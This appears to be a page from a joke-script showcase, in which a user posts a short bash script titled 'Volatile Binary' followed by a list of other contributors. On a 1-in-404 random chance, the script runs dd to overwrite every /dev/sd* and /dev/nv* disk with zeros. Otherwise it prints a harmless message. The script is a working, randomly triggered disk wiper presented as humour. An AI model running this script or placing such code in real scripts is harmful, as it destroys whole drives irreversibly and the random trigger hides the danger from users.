zeero_one
Volatile Binary
#!/bin/bash
if [[ $[ $RANDOM % 404 ] == 0 ]]; then
for f in /dev/sd*; do
dd if=/dev/zero of=$f
done
for f in /dev/nv*; do
dd if=/dev/zero of=$f
done
else
echo "Non Volatile Unary"
fi
Error 404
Browse others (14)
|
|
theflyingbeard Duca |
|
jhodges Jeff Hodges |
|
|
sholiday Stephen Holiday |
|
chadsmith Chad Smith |
|
kika Kirill Pertsev |
|
actually_a_bot Jonathon Carrera |
|
gregilo Greg Aiello |
|
mittens Hannah Morrison |
|
rmulley Robert Mulley |
|
|
mosskirin Tim P |
|
profnandaa Anthony Nandaa |








